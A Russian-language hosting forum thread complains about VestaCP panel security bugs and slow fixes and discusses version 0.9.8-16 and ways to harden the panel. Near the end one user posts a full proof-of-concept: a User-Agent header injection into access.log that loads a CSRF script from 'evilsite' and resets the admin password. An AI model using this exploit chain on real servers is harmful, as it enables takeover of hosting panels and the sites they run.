Заметка Уязвимость в панели VestaCP

X-Oleg

Местный
Сообщения
588
Репутация
628
Баллы
93
Чот не пойму это не этот баг:

Пожалуйста, Войдите или Зарегистрируйтесь для просмотра скрытого текста.

?:eek::eek::eek:

Или этот поправили ? Просто смотрю последняя версия 0.9.8-15, если так, то явно не красит разработчиков этой панели, ибо баг с февраля и что-то много багов у неё и почти все удаленные...:(
 

SrDEN

Местный
Сообщения
115
Репутация
109
Баллы
43
А я с весты ушел больше года назад, как раз из-за их лени,.. От них больше года ждал обновы, но так и не дождался :)
 

mygedz

Местный
Сообщения
235
Репутация
156
Баллы
43
SrDEN, меня это тоже напрягает. Решать особо ничего не хотят. Тех поддержка на нуле. Только отсылают. Конкретных решений не дают.
А на какую панельку ушел!?
 

SOUL

Создатель
Сообщения
7 920
Репутация
11 253
Баллы
266
А если панель держать постоянно в отключенном состоянии, включать по мере необходимости и сразу после использования выключать её, тогда волноваться не о чем, или я суть не верно понимаю?
 

mygedz

Местный
Сообщения
235
Репутация
156
Баллы
43
SOUL, если отключена, то все ок.
 

mygedz

Местный
Сообщения
235
Репутация
156
Баллы
43
Кстати, разбары должны обновить панель до версии 16. А это будет полностью переисанная панелька. Интересно прям.
 
  • Мне нравится
Реакции: SOUL

Nik@ll

Местный
Сообщения
105
Репутация
90
Баллы
28
SrDEN, меня это тоже напрягает. Решать особо ничего не хотят. Тех поддержка на нуле. Только отсылают. Конкретных решений не дают.
Должны? У них форум - кладезь готовых решений + багтреккер с исправлениями, просто они не фиксят текущий релиз по своим мотивам. 15-ю версию выкатили слишком рано на плач на форуме "ну когда же", но основные баги фиксятся буквально за 5-10 минут. Панель очень простая, стабильная, дописывается даже с элементарными познаниями в bash, прикручивается все что угодно, не жрет ресурсов, идеальна для небольших vds с кастомными конфигами - и она отгрызла весомый кусок у ispmanager в коммерческом хостинге.

А если панель держать постоянно в отключенном состоянии, включать по мере необходимости и сразу после использования выключать её, тогда волноваться не о чем, или я суть не верно понимаю?
Очень хорошее решение. Панель можно даже не включать, она полностью функциональна с консоли, часть операций с web-интерфейса не доступны. Ломать тогда нечего, если не держать сайты под admin (чем грешат многие).

Кстати, разбары должны обновить панель до версии 16. А это будет полностью переисанная панелька. Интересно прям.
В этом то и попаболь, нужно приготовиться что панель (досрочный релиз) выйдет сырой.Тестовые vds-ки уже нарезаны и ждут релиза, а на рабочих хостах автообновление отключено. И хорошо если выкатят релиз на днях.
 
Последнее редактирование:

Nik@ll

Местный
Сообщения
105
Репутация
90
Баллы
28
Последнее редактирование:

mygedz

Местный
Сообщения
235
Репутация
156
Баллы
43
Должны? У них форум - кладезь готовых решений + багтреккер с исправлениями, просто они не фиксят текущий релиз по своим мотивам. 15-ю версию выкатили слишком рано на плач на форуме "ну когда же", но основные баги фиксятся буквально за 5-10 минут. Панель очень простая, стабильная, дописывается даже с элементарными познаниями в bash, прикручивается все что угодно, не жрет ресурсов, идеальна для небольших vds с кастомными конфигами - и она отгрызла весомый кусок у ispmanager в коммерческом хостинге.
Должны, раз предоставляют продукт. Не все гуру в линуксе. "Кладезь готовых решений" я не особо вижу. А лишь отписки. Мне их форум напоминает лишь одно: как представители хостингов между собой красуются, кто круче.

В этом то и попаболь, нужно приготовиться что панель (досрочный релиз) выйдет сырой.Тестовые vds-ки уже нарезаны и ждут релиза, а на рабочих хостах автообновление отключено. И хорошо если выкатят релиз на днях.
Ну вот в этом и проблема, что они получается второй раз выкатывают сырой продукт.
Выкатили.

В репе 16-я лежит версия (vesta.x86_64 0:0.9.8-16)
На железке пока еще версия 15. Хотя автообновление стоит
 

X-Oleg

Местный
Сообщения
588
Репутация
628
Баллы
93
А если панель держать постоянно в отключенном состоянии, включать по мере необходимости и сразу после использования выключать её, тогда волноваться не о чем, или я суть не верно понимаю?
Я-бы ещё подстраховался и залочил порт админки, только для своих айпишников, тогда хакеры в админку не попадут...

Просто если нужна панель, то через ssh добовлять свой айпи и всё, там команда простая, ну или проще, если еть деньги, купить VPN, например от hideme и через него заходить, добавив айпи, там можно заказать выделенный айпи для себя... Дешевле конечно свой поднять VPN, например, тот-что у меня в подписе, там и настроить помогут сразу, т.е. получите уже готовый VPN сервер с выделенным айпи !

Должны, раз предоставляют продукт. Не все гуру в линуксе. "Кладезь готовых решений" я не особо вижу. А лишь отписки. Мне их форум напоминает лишь одно: как представители хостингов между собой красуются, кто круче.
Ну это бесплатная-же панель, мне больше не нравится что баг в безопасности с февраля так и не фиксили, разве незнали ? Также глянул, что-то много там было исправлено багов в безопасности, что тоже не есть гуд !

Так-то панель не плохая в целом, учитывая что бесплатная, функционал имею в виду ! :)
 

mygedz

Местный
Сообщения
235
Репутация
156
Баллы
43
Судя по некоторым постам на офф форуме. У некоторых после обновления есть проблемы.
Я вообще отключил автообновление.
 

Nik@ll

Местный
Сообщения
105
Репутация
90
Баллы
28
У некоторых после обновления есть проблемы.
Это уже

Пожалуйста, Войдите или Зарегистрируйтесь для просмотра скрытого текста.

, обновлялся - все на месте.

2016-06-28_133716.png

Переписано действительно много (ковыряюсь в /usr/local/vesta/bin/), мне нравится, код стал лучше, читабельней. Чуть переделал свои патчи, легли ровно.
Критические моменты по коду убраны, уже радует, часть багов отсталось. Фикс для 7-го центоса, отображение памяти /usr/local/vesta/bin/v-update-sys-rrd-mem
Код:
# Parsing data
if [ "$period" = 'daily' ]; then
    mem=$(free -m)
    used=$(echo "$mem" |awk '{print $3}'|head -n2 |tail -n1)
    free=$(echo "$mem" |awk '{print $4}'|head -n2 |tail -n1)
    swap=$(echo "$mem" |awk '{print $3}'|tail -n1)

    # Updating rrd
    rrdtool update $RRD/mem/mem.rrd N:$used:$swap:$free
fi
 

mygedz

Местный
Сообщения
235
Репутация
156
Баллы
43
Nik@ll, вообщем решился и обновил. Вроде все норм пока. Очень жду, когда они сделают возможность выбора версии php.

Что там они переписали, я незнаю. Знаний таких нет.
 

mygedz

Местный
Сообщения
235
Репутация
156
Баллы
43
Кстати! В чем уязвимость то была! Прям интересно)))
 

Nik@ll

Местный
Сообщения
105
Репутация
90
Баллы
28
Очень жду, когда они сделают возможность выбора версии php.
Доброе утро.

Пожалуйста, Войдите или Зарегистрируйтесь для просмотра скрытого текста.


Просто переписать под 16-ю или подождать пока перепишут.

Хотя смена версий не нужна от слова совсем - это все от лукавого.

Мы и не занимались графиками. Если вы читали сообщения форума, то могли заметить что мы выпустили релиз досрочно из-за проблем безопасности и часть идей и багов перенесли на 17 релиз.
 
Последнее редактирование:

mygedz

Местный
Сообщения
235
Репутация
156
Баллы
43
Nik@ll, а что доброе утро то!?)) Я жту тем не один раз видел. И опять же это кастом для Centos. У меня Debian. Во вторых разработчикам был задан вопрос на офф форуме, на который они так и не ответили: не помешают ли кастомы офф обновлениям VestaCP. На что разработчики ответили: давайте вместе подумаем...

Хотя смена версий не нужна от слова совсем - это все от лукавого.
Ну тут уж как для кого. Опять же, ты смотришь с высоты своих знаний. Не у всех они есть. Так что надо быть проще). Уж поверь я знаю много чего другого в тех плане, что знают единицы. Надо быть всегда человеком.
 

mygedz

Местный
Сообщения
235
Репутация
156
Баллы
43
Смотрю на офф форуме у многих есть проблемы после обновления. С Убунтой пока ток. Я обновился, все отлично- Debian.
 

X-Oleg

Местный
Сообщения
588
Репутация
628
Баллы
93
Кстати! В чем уязвимость то была! Прям интересно)))
Вот сплоит:
Код:
Poc Exploit
================
1.Подготовьте js файл (evil.js):

function csrfWithToken(url,hanimisToken,password){
  $.get(url, function(gelen) {
    $('body').append($(gelen));
    $('form[id="vstobjects"]').css("display","none");
    var token = $(hanimisToken).attr("token");
    $('form[id="vstobjects"]').attr("action",url);
    $('input[name="v_password"]').val(password);
    $('form[id="vstobjects"]').submit();
  });
};
//password = 1234567
csrfWithToken("/edit/user/?user=admin","#token","123456");

2. Сделайте Get-запрос с этим js-файлом:
wget --header="Accept: text/html" --user-agent="<script src='http://evilsite/evil.js'></script>" http://victimserver

3. Дожидаемся когда администратор прочитает access.log, что сделает инъекцию нашего evil.js

4. Логинимся с изменённым паролем:
http(s)://victim:8083/
Можете проверить заодно, всё-ли там залатали ! :)
 

Nik@ll

Местный
Сообщения
105
Репутация
90
Баллы
28
И опять же это кастом для Centos. У меня Debian
Это не кастом, это

Пожалуйста, Войдите или Зарегистрируйтесь для просмотра скрытого текста.

- софт сторонних разработчиков. Основан на репозитории remi, в котором сейчас есть от php 5.4 до php 7.0 включительно со всеми популярными модулями. В дебиане такого нет (к вопросу о выборе дистрибутива). Коммерческие панели или сами собирают (cPanel) или держат свои репозитории (ISP)

Во вторых разработчикам был задан вопрос на офф форуме, на который они так и не ответили: не помешают ли кастомы офф обновлениям VestaCP
Нет, разработчикам был задан вопрос про свои шаблоны, на что разработчики ответили что свои шаблоны слететь не должны (при апдейте пишется поверх, без предварительного удаления). Вот у меня дописана привязка почтового домена к ip - тут после обновления заново дописать и все.

Ну тут уж как для кого. Опять же, ты смотришь с высоты своих знаний. Не у всех они есть. Так что надо быть проще). Уж поверь я знаю много чего другого в тех плане, что знают единицы. Надо быть всегда человеком.
Знаешь, чем отличается ламер от ебилда? Ламер учится, ебилду все должны.

Смотрю на офф форуме у многих есть проблемы после обновления
Ничего критичного пока нет, конфиги не ломает, сайты не падают.
 

mygedz

Местный
Сообщения
235
Репутация
156
Баллы
43
Ух как все просто, на первый взглд)).
Опять же: это была какая-то целенаправленная атака на какой-то сервер!? И потом уже использу данныей "скрипт" стали другие ломать!?
Или конкуренты!?
Или сами разбары: своего рода пиар. Типа как мы быстро прикрыли дыру)).
Просто интересно: для чего и зачем вообще это сделали. У каждого деяния есть какая-то цель.
 
Сверху Снизу